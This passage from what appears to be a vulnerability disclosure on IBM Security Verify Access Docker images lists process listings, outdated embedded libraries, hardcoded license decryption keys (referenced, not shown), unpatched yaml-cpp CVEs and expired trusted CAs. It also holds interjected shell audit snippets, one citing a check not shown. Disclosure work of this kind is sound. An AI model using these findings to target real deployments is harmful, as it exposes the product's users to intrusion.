Ssl Oct04 0:02 /usr/sbin/wga_watchdogd slapdw -log_file /var/application.logs.local/verify_access_runtime/user_registry/msg__user_registry.log /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap\n ldap 753 0.0 4.3 1314228 346548 ? Sl Oct04 0:00 /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap\n isam 757 0.0 0.0 271124 8 ? Ssl Oct04 0:02 /usr/sbin/wga_watchdogd ISAM-Policy-Server -log_file /var/application.logs.local/verify_access_runtime/policy/msg__pdmgrd.log -cfg /var/PolicyDirector/etc/ivmgrd.conf /opt/PolicyDirector/bin/pdmgrd -foreground\n ivmgr 762 0.0 0.1 1070184 10860 ? Sl Oct04 0:01 /opt/PolicyDirector/bin/pdmgrd -foreground\n isam 805 0.0 0.0 71488 316 ? Ss Oct04 0:00 /usr/sbin/iss-lum\n isam 806 0.0 0.0 343920 5264 ? Sl Oct04 0:00 /usr/sbin/iss-lum\n root 811 0.0 0.0 41984 2416 ? Ss Oct04 0:00 /usr/sbin/crond\n isam 834 0.0 0.0 128400 2076 ? Ssl Oct04 0:00 /usr/sbin/rsyslogd\n root 859 0.0 0.0 174348 96 ? Ss Oct04 0:00 /usr/sbin/wga_servertaskd\n ivmgr 861 0.0 0.0 276544 84 ? Sl Oct04 0:00 /usr/sbin/wga_servertaskd\n isam 870 0.0 0.0 273920 8 ? Ssl Oct04 0:02 /usr/sbin/wga_watchdogd wga_notifications -log_file /var/log/wga_notifications.log wga_notifications -foreground\n isam 877 2.1 0.2 563872 18472 ? Sl Oct04 38:43 wga_notifications -foreground\n isam 889 0.0 0.0 12060 80 ? S Oct04 0:00 /bin/sh /sbin/bootstrap.sh\n isam 892 0.0 0.0 23068 24 ? S Oct04 0:00 /usr/bin/coreutils --coreutils-prog-shebang=tail /usr/bin/tail -F -n+0 /var/application.logs.local/lmi/messages.log\n isam 217541 4.0 0.0 19248 3836 pts/0 Ss 21:37 0:00 bash\n isam 217564 0.0 0.0 54808 4080 pts/0 R+ 21:37 0:00 ps -auxww\n [isam@verify-access /]$ \n\nThis program appears to establish connections to remote servers to check the license. 
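The `strings | grep` check shown earlier for `/opt/dca/lib` generalizes to a quick audit loop over any set of binaries. The sketch below runs against a locally created stand-in file carrying an old OpenSSL version marker, since the appliance binaries are not available here:

```shell
# Report the first embedded OpenSSL version string found in each file.
# grep -a treats binary files as text, so this works without `strings`.
audit_openssl_strings() {
    for f in "$@"; do
        ver=$(grep -a -m 1 -o 'OpenSSL [0-9][^ ]*' "$f") && echo "$f: $ver"
    done
}

# Stand-in binary with an embedded version marker (illustrative):
fake_bin=$(mktemp)
printf 'garbage\nOpenSSL 0.9.7j 04 May 2006\nmore garbage\n' > "$fake_bin"
audit_openssl_strings "$fake_bin"
```

On a live appliance, pointing this at `/usr/sbin/*` and `/opt/dca/bin/*` would surface every statically embedded OpenSSL version in one pass.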
\n\nThe OpenSSL library embedded inside the program is completely outdated (0.9.7j - Feb 2007):\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFurthermore, this program includes several hardcoded keys to decrypt the private key in `/etc/lum/private.pem`. In the function ctor_009:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nSome decryption keys have been identified within the binaries used to check the license:\n\nFunction `sub_4806C0`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFunction `ctor_009`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe Docker images contain known vulnerabilities. \n\n\n\n## Details - Outdated \"IBM Crypto for C\" library\n\nIt was observed that the IBM Crypto for C library is installed inside all the Docker images in the directory `/usr/local/ibm/gsk8_64`:\n\nFor example, from the Docker image verify-access-wrp:\n\n kali-docker# cd ./_verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a \n kali-docker# find usr/local/ibm \n usr/local/ibm\n usr/local/ibm/gsk8_64\n usr/local/ibm/gsk8_64/lib64\n usr/local/ibm/gsk8_64/lib64/libgsk8cms_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8kicc_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8p11_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8ssl_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8drld_64.so\n usr/local/ibm/gsk8_64/lib64/C\n usr/local/ibm/gsk8_64/lib64/C/icc\n usr/local/ibm/gsk8_64/lib64/C/icc/icclib\n usr/local/ibm/gsk8_64/lib64/C/icc/icclib/libicclib084.so\n usr/local/ibm/gsk8_64/lib64/C/icc/icclib/ICCSIG.txt\n usr/local/ibm/gsk8_64/lib64/libgsk8ldap_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8iccs_64.so\n 
usr/local/ibm/gsk8_64/lib64/libgsk8valn_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8acmeidup_64.so\n usr/local/ibm/gsk8_64/lib64/N\n usr/local/ibm/gsk8_64/lib64/N/icc\n usr/local/ibm/gsk8_64/lib64/N/icc/icclib\n usr/local/ibm/gsk8_64/lib64/N/icc/icclib/libicclib085.so\n usr/local/ibm/gsk8_64/lib64/N/icc/icclib/ICCSIG.txt\n usr/local/ibm/gsk8_64/lib64/N/icc/ReadMe.txt\n usr/local/ibm/gsk8_64/lib64/libgsk8dbfl_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8km2_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8km_64.so\n usr/local/ibm/gsk8_64/lib64/libgsk8sys_64.so\n usr/local/ibm/gsk8_64/docs\n usr/local/ibm/gsk8_64/copyright\n usr/local/ibm/gsk8_64/inc\n usr/local/ibm/gsk8_64/bin\n usr/local/ibm/gsk8_64/bin/gsk8capicmd_64\n usr/local/ibm/gsk8_64/bin/gsk8ver_64\n usr/local/ibm/.wh..wh..opq\n kali-docker#\n\nThis library is based on the opensource libraries zlib and OpenSSL. It was built in October 2020, as shown below:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFurthermore, the copyrights from the `/usr/local/ibm/gsk8_64/lib64/N/icc/ReadMe.txt` file indicate:\n\n- - (C) 1995-2004 Jean-loup Gailly and Mark Adler - for zlib\n- - Copyright (c) 1998-2007 The OpenSSL Project. All rights reserved. - for OpenSSL\n\nThe `/usr/local/ibm/gsk8_64/lib64/N/icc/icclib/ICCSIG.txt` file confirms the libraries were generated 2 years ago:\n\n #\n # IBM Crypto for C. 
\n # ICC Version 8.7.37.0\n #\n # Note the signed library contains a copy of cryptographic code from OpenSSL (www.openssl.org),\n # zlib (www.zlib.org)\n # and IBM code (www.ibm.com)\n #\n # Platform AMD64_LINUX\n #\n # Generated Tue Oct 13 12:09:08 2020\n #\n # File name=libicclib085.so\n # File Hash (SHA256)=bbbb89eae43b11aba9a132a53207ca532236cd064b6aa0b84ea878a0b9bf8b4f\n #\n FILE=906082662e6b3a50fc01a95f2d1bb29d3a54349ad76da59fc8555fadadae4e5305463810ece2064174129a95e89352a02d8c72c7397de2d01b38220c3222796992785b8d99401a65b0894778a2b05760ae1a6919a97e259d270ff5e6996a14fc29e48a848c59e14f2aa758e8e26355faeff60eca0562ad643a86b8fdaa6afd10190190d411a584679ff1ee93caf5039ef070d411040fc828e4b8f79b8bb67d3ec1708c8274c0c9f6899399492fa52c73574065f2684dcc336c41eee2b808b42b0a01578b32fae245b761580240e3b53359767634ba76018f46a8d732c21ec24bf1a979aa11af20b646f166d5658efabcebdf6283fbdc793d82636e89bf2ac4ad\n #\n SELF=10fefb48a0666936f23aceae7805a7dcefb06a9a2282fea0693610a98ccf12cab8bfef973cda13450afde785960eccb2637adaf15f5e795cdb21f667704ba30ebf6a6a077f29a3574d0792ef633172d324a5b26adc257d3380ffd1cf7698bc560fb52d5c083ffa85fe623e059f7c8d67a8043ca75d8808c082de29bb8e1c46a01421039e557699cf7747c07a22a0e1612b0e4de8836833bebc888269dc46adf0ed5ba0107da2e683554433ed29ab840d16af34581682e35a30d11ff10fbd8ba0cc7ae6a62b75c3ba4758863e5a5a4cf00371040358a732a56ecf7dd04523c85544755c6f0f42447f383ec22e0ee4d79bb3c6e6defc4319f555afaaa1cfc8642f\n #\n #Do not edit before this line\n #\n # Global Settings\n ICC_ALLOW_2KEY3DES=1\n\nThe OpenSSL code and the zlib code are at least 2 year old and vulnerable to CVEs. \n\nThe Docker images contain known vulnerabilities. \n\n\n\n## Details - Webseald using outdated code with remotely exploitable vulnerabilities\n\nIt was observed that the webseald program borrows codes provided by open-source libraries containing outdated and vulnerable code. 
\nThis program can be found inside these 2 images:\n\n- - verify-access\n- - verify-access-wrp\n\nWebseald is reachable over the network. \n\nLibraries used by webseald:\n\n kali-docker# ldd ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/opt/pdweb/bin/webseald\n linux-vdso.so.1 (0x00007fffe59f3000)\n libwsdaemon.so =\u003e not found\n libamwoauth.so =\u003e not found\n libamweb.so =\u003e not found\n libamwebrte.so =\u003e not found\n libpdsvcutl.so =\u003e not found\n libtivsec_msg.so =\u003e not found\n libpdz.so =\u003e not found\n libdl.so.2 =\u003e /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f61885e8000)\n libtivsec_xslt4c.so.112 =\u003e not found\n libtivsec_xml4c.so =\u003e not found\n libtivsec_yamlcpp.so =\u003e not found\n libam_gssapi_krb5.so =\u003e not found\n libmodsecurity.so.3 =\u003e not found\n libamwredismgr.so =\u003e not found\n libhiredis.so.0.15 =\u003e not found\n libhiredis_ssl.so.0.15 =\u003e not found\n libpthread.so.0 =\u003e /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f61885df000)\n libstdc++.so.6 =\u003e /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f6188200000)\n libm.so.6 =\u003e /lib/x86_64-linux-gnu/libm.so.6 (0x00007f6188504000)\n libgcc_s.so.1 =\u003e /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f61884e4000)\n libc.so.6 =\u003e /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6187e00000)\n /lib64/ld-linux-x86-64.so.2 (0x00007f6188604000)\n\nThe IBM-specific libraries (*.so*) have been analyzed only in surface to detect low-hanging fruits, and several vulnerabilities were found, including some pre-auth vulnerabilities. \n\nWebseal is directly reachable from the network but uses the outdated and vulnerable code. \n\nThe quality of the code is extremely inequal between the libraries - some code is very well implemented (with secure calls to -cpy functions) and some code is vulnerable (with insecure calls to -cpy functions). 
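A quick triage for the insecure `-cpy` calls mentioned above is to look for unbounded copy symbols in each library (on a real target, `nm -D` on the dynamic symbol table would be more precise than a raw string scan). The file below is a local stand-in, not an IBM library:

```shell
# Flag files whose contents reference unbounded copy functions.
scan_unsafe_copies() {
    for lib in "$@"; do
        if grep -a -q -e 'strcpy' -e 'strcat' -e 'sprintf' "$lib" ; then
            echo "$lib: references unbounded copy functions"
        fi
    done
}

fake_lib=$(mktemp)
printf 'strlen\0strcpy\0memcpy\0' > "$fake_lib"
scan_unsafe_copies "$fake_lib"
```

A hit is only a lead, not proof of a vulnerability, but it identifies which libraries deserve the manual review described above first.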
These libraries contain some legacy code that is not up to date with current security standards. \n\nDue to time constraints, only a superficial analysis was done - an attacker with time will likely find 0-day vulnerabilities in these libraries. \n\n\n\n### Libmodsecurity.so - 1 non-assigned CVE vulnerability\n\nThe `/opt/pdweb/lib/libmodsecurity.so.3` library (b939c5db3ca94073188ea6eb360049f58f9e9d2a9c7d72bc052d9ee47cc5eccc) contains a vulnerable libinjection library. The version used is 3.9.2:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThis version (3.9.2) is known to have several vulnerabilities. For example, a pre-authentication DoS (https://github.com/SpiderLabs/ModSecurity/issues/1412) from 2017 (no CVE). \n\nThis version is confirmed to be vulnerable: https://github.com/client9/libinjection/issues/124. \n\n\n\n### libtivsec_yamlcpp.so - 4 CVEs\n\nThis IBM library is entirely based on yaml-cpp. Yaml-cpp is available at https://github.com/jbeder/yaml-cpp. \n\nSeveral vulnerabilities have been patched in 2020 (CVE-2017-5950, CVE-2018-20573, CVE-2018-20574 and CVE-2019-6285) in the yaml-cpp library. \n\nThis IBM-specific library is located at `/usr/lib64/libtivsec_yamlcpp.so` and `/opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so` (cf1b80c501a2f42948322567477c2956155e244d645e3962985569c4496ffad90). \n\nReverse engineering of this file shows that no security patches have been imported from the official yaml-cpp repository. \n\nWe can identify several methods from the yaml-cpp library. 
For example, the method `SingleDocParser::HandleFlowMap()` found in `/usr/lib64/libtivsec_yamlcpp.so` and `/opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nWhen analyzing the security patches available at https://github.com/jbeder/yaml-cpp/pull/807 and https://github.com/jbeder/yaml-cpp/pull/807/files/dbd5ac094622ef3b3951e71c31f59e02c930dc4b, there is no reference in the compiled code regarding a `DeepRecursion` class or any method implemented in the security patches. This `DeepRecursion` class is included in the now-patched versions. \n\nThe IBM-specific library is using an outdated and vulnerable version of yaml-cpp, without security patches, e.g. 4 CVEs patched in yaml-cpp - https://github.com/jbeder/yaml-cpp/pull/807. \n\nAnalysis of the security patches implementing new classes:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFurthermore, it is possible to analyze the rest of the security patches from the git repository and compare them with the assembly code from the `libtivsec_yamlcpp.so` library. This allows us to conclude the security patches have not been imported into the `libtivsec_yamlcpp.so` library. 
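The patch-presence test used above reduces to a string-table check: library builds from patched yaml-cpp sources carry the `DeepRecursion` class name, while pre-patch builds do not. A sketch against a locally created stand-in for `libtivsec_yamlcpp.so` (the real library is not available here):

```shell
# A library built from patched yaml-cpp sources should embed the
# DeepRecursion symbol name; its absence suggests pre-patch code.
has_recursion_guard() {
    grep -a -q 'DeepRecursion' "$1"
}

yaml_stub=$(mktemp)
printf 'SingleDocParser::HandleFlowMap\n' > "$yaml_stub"
if has_recursion_guard "$yaml_stub" ; then
    echo "recursion guard present"
else
    echo "no recursion guard found"
fi
```

Absence of the symbol is strong but not conclusive evidence (symbols can be stripped or inlined), which is why the assembly-level comparison below remains the decisive test.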
\n\nSource code providing the security patches:\n\nMethod `HandleNode()` from the security patches and the patched versions of yaml-cpp:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nWith the assembly code extracted from the `libtivsec_yamlcpp.so` library and rebuilt into pseudo-code, we can identify the same logic and the same instructions (minus some errors due to the reconstruction from assembly to C++) - except that the patch located on line 51 is missing. \n\nPseudo-code of method `HandleNode()`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThis allows us to conclude that the `libtivsec_yamlcpp.so` library is vulnerable to these 4 CVEs. \n\n\n\n### libtivsec_xml4c.so - outdated Xerces-C library\n\nThis library (8b3d3d2dcb1152966d097e91e08fa1dc4300f3653f1c264eeecaf20bb1550832) is located in `/usr/lib64/libtivsec_xml4c.so` and `/opt/ibm/Tivoli/SecUtilities/lib/libtivsec_xml4c.so` and uses outdated code from XML4C 5.5.0 that includes a version of Xerces-C (XML4C doesn't exist anymore and the latest release appears to be from 2007-2008). \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThis version is quite outdated and is likely vulnerable to known CVEs (https://xerces.apache.org/xerces-c/secadv.html). \n\n\n\n## Details - Outdated and untrusted CAs used in the Docker images\n\nIt was observed that the Docker images trust invalid Certificate Authorities (CAs). \n\nUsing the Paranoia program, we can list the invalid, expired and revoked CAs that are trusted inside the 4 Docker images. \n\nIt appears that these 4 Docker images trust some invalid, revoked or untrusted CAs. 
\n\nResults for ibmcom/verify-access:10.0.4.0:\n\n\u003cpre\u003e\nkali-docker# paranoia inspect ibmcom/verify-access:10.0.4.0\nCertificate CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=VeriSign Trust Network+OU=(c) 2006 VeriSign\\, Inc. - For authorized use only,O=VeriSign\\, Inc.,C=US\n removed from Mozilla trust store, no reason given\n\nCertificate CN=DigiCert ECC Secure Server CA,O=DigiCert Inc,C=US\n expires soon ( expires on 2023-03-08T12:00:00Z, 19 weeks 2 days until expiry)\n\nCertificate CN=Test CA,O=genua mbh\n expired ( expired on 2014-10-23T08:22:40Z, 8 years 3 days since expiry)\n\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. \n expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. 
Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\n\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. 
\n expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL\n expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO\n expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry)\n\nFound 395 certificates total, of which 21 had issues\n\u003c/pre\u003e\n\n\n\nResults for:\n\n- - ibmcom/verify-access-runtime:10.0.4.0\n- - ibmcom/verify-access-wrp:10.0.4.0 \n- - ibmcom/verify-access-dsc:10.0.4.0\n\n\u003cpre\u003e\nkali-docker# paranoia inspect ibmcom/verify-access-runtime:10.0.4.0\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. 
\nexpired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\n\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. 
Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\n\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. \nexpired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL\n expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. 
Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO\n expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry)\n\nFound 374 certificates total, of which 18 had issues\n\u003c/pre\u003e\n\nThe communications used in the ISVA platform use SSL/TLS with a trust entirely based on underlying CAs. Some CAs have been revoked and cannot be trusted anymore. \n\nThe presence of revoked and expired CAs also shows that the security of the Docker images is highly perfectible. \n\n\n\n## Details - Lack of privilege separation in Docker instances\n\nIt was observed that the Docker images do not implement privilege separation. Privilege separation is a software-based implementation of the principle of least privilege. \n\nUsing dynamic analysis, the ibmcom/verify-access-wrp:10.0.4.0 Docker image, ibmcom/verify-access:10.0.4.0 Docker image, and the ibmcom/verify-access-runtime Docker image do not correctly implement privilege separation. \n\nProcesses running inside the ibmcom/verify-access:10.0.4.0 Docker image:\n\n USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n isam 1 0.0 0.0 12060 2812 ? Ss Oct21 0:00 /bin/sh /sbin/bootstrap.sh\n isam 312 0.0 0.0 24532 56 ? Ss Oct21 0:00 /usr/sbin/mesa_crashd\n isam 314 0.1 0.0 24568 2056 ? R Oct21 6:20 /usr/sbin/mesa_crashd\n isam 318 0.0 0.0 69160 2732 ? Ss Oct21 0:00 /usr/sbin/mesa_syslogd\n isam 322 0.0 0.0 69224 2164 ? S Oct21 0:02 /usr/sbin/mesa_syslogd\n isam 399 0.0 0.0 102760 2740 ? Ss Oct21 0:00 /usr/sbin/mesa_eventsd -m 1000\n isam 400 0.0 0.1 711216 8276 ? Sl Oct21 0:00 /usr/sbin/mesa_eventsd -m 1000\n isam 747 0.0 0.0 270992 7452 ? 
Ssl Oct21 0:06 /usr/sbin/wga_watchdogd slapdw -log_file /var/application.logs.local/verify_access_runtime/user_registry/msg__user_registry.log /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap \n isam 756 0.0 0.0 271124 7308 ? Ssl Oct21 0:06 /usr/sbin/wga_watchdogd ISAM-Policy-Server -log_file /var/application.logs.local/verify_access_runtime/policy/msg__pdmgrd.log -cfg /var/PolicyDirector/etc/ivmgrd.conf /opt/PolicyDirector/bin/pdmgrd -foreground\n isam 807 0.0 0.0 71488 3084 ? Ss Oct21 0:00 /usr/sbin/iss-lum\n isam 808 0.0 0.5 343920 42140 ? Sl Oct21 0:00 /usr/sbin/iss-lum\n isam 833 0.0 0.0 128400 5140 ? Ssl Oct21 0:00 /usr/sbin/rsyslogd\n isam 873 0.0 0.0 273920 7080 ? Ssl Oct21 0:06 /usr/sbin/wga_watchdogd wga_notifications -log_file /var/log/wga_notifications.log wga_notifications -foreground\n isam 879 1.5 0.5 563872 42292 ? Sl Oct21 71:40 wga_notifications -foreground\n isam 892 0.0 0.0 12060 1804 ? S Oct21 0:00 /bin/sh /sbin/bootstrap.sh\n isam 895 0.0 0.0 23068 1256 ? S Oct21 0:00 /usr/bin/coreutils --coreutils-prog-shebang=tail /usr/bin/tail -F -n+0 /var/application.logs.local/lmi/messages.log\n isam 573957 0.0 0.0 47620 3696 pts/0 Rs+ 16:53 0:00 ps -aux\n isam 573963 0.0 0.0 11928 2852 ? S 16:53 0:00 sh -c ls /var/support/core_*.* | wc -l\n \n pgresql 434 0.0 0.2 188380 17492 ? Ss Oct21 0:06 /usr/bin/postgres -D /var/postgresql/config/data\n pgresql 435 0.0 0.0 138892 2960 ? Ss Oct21 0:00 postgres: logger\n pgresql 446 0.0 0.0 188380 2696 ? Ss Oct21 0:00 postgres: checkpointer\n pgresql 447 0.0 0.0 188516 4676 ? Ss Oct21 0:03 postgres: background writer\n pgresql 448 0.0 0.0 188380 5148 ? Ss Oct21 0:03 postgres: walwriter\n pgresql 449 0.0 0.0 189112 5312 ? Ss Oct21 0:04 postgres: autovacuum launcher\n pgresql 450 0.0 0.0 139024 3016 ? Ss Oct21 0:15 postgres: stats collector\n pgresql 451 0.0 0.0 188916 5492 ? 
